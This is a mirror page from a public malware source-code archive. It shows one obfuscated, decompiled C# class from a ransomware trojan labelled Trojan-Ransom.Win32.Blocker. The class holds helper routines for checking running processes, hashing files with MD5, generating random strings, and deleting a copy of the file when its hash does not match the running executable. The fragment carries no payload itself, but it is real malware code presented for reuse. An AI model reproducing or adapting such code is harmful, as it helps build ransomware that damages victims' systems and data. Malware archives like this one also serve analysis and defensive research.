mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-22 03:16:11 +00:00
f2ac1ece55
add
50 lines
2.4 KiB
C#
50 lines
2.4 KiB
C#
// Decompiled with JetBrains decompiler
|
|
// Type: A.cee7cc3756d4f6d8913411c92b2e1cc36
|
|
// Assembly: Sharl, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
// MVID: F11368F2-49D5-4A01-9284-978C5FDD6F03
|
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570.exe
|
|
|
|
using System;
|
|
using System.Diagnostics;
|
|
using System.IO;
|
|
using System.Security.Cryptography;
|
|
using System.Text;
|
|
|
|
namespace A
|
|
{
|
|
internal class cee7cc3756d4f6d8913411c92b2e1cc36
|
|
{
|
|
public bool c8aea4603f5edff1781d66fc7c389635e(string cf11b7aa1c9e7d8e2089a37fab75f7bc2) => Process.GetProcessesByName(cf11b7aa1c9e7d8e2089a37fab75f7bc2).Length > 0;
|
|
|
|
private string c0b5e2bd54f7aaa36254ad6108123d704(string c32d06ec84131a62668e3e18e23c950ae)
|
|
{
|
|
FileStream inputStream = File.OpenRead(c32d06ec84131a62668e3e18e23c950ae);
|
|
byte[] hash = new MD5CryptoServiceProvider().ComputeHash((Stream) inputStream);
|
|
inputStream.Close();
|
|
return BitConverter.ToString(hash).Replace(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(390), "").ToUpper();
|
|
}
|
|
|
|
public string c31239248ceba059cc32e70ac96898ec2(string c45a1644c18560d9d988c8c135941ea96) => BitConverter.ToString(new MD5CryptoServiceProvider().ComputeHash(Encoding.Default.GetBytes(c45a1644c18560d9d988c8c135941ea96))).Replace(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(390), "").ToLower().ToUpper();
|
|
|
|
public string c4028bc68211f16a03921654b4b8b346f(int cc0d8efdc055b694066b5391dc96356b6)
|
|
{
|
|
Random random = new Random();
|
|
string str = c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(393);
|
|
string empty = string.Empty;
|
|
for (int index = 0; index < cc0d8efdc055b694066b5391dc96356b6; ++index)
|
|
empty += str.Substring(random.Next(0, str.Length), 1);
|
|
return empty;
|
|
}
|
|
|
|
public bool c8f544c7c514248e2027acc2eed25b743(string c8ce60bab4df112e38d93bdc39407e331)
|
|
{
|
|
if (!File.Exists(c8ce60bab4df112e38d93bdc39407e331))
|
|
return false;
|
|
if (!(this.c0b5e2bd54f7aaa36254ad6108123d704(c8ce60bab4df112e38d93bdc39407e331) != this.c0b5e2bd54f7aaa36254ad6108123d704(Process.GetCurrentProcess().MainModule.FileName)))
|
|
return true;
|
|
File.Delete(c8ce60bab4df112e38d93bdc39407e331);
|
|
return false;
|
|
}
|
|
}
|
|
}
|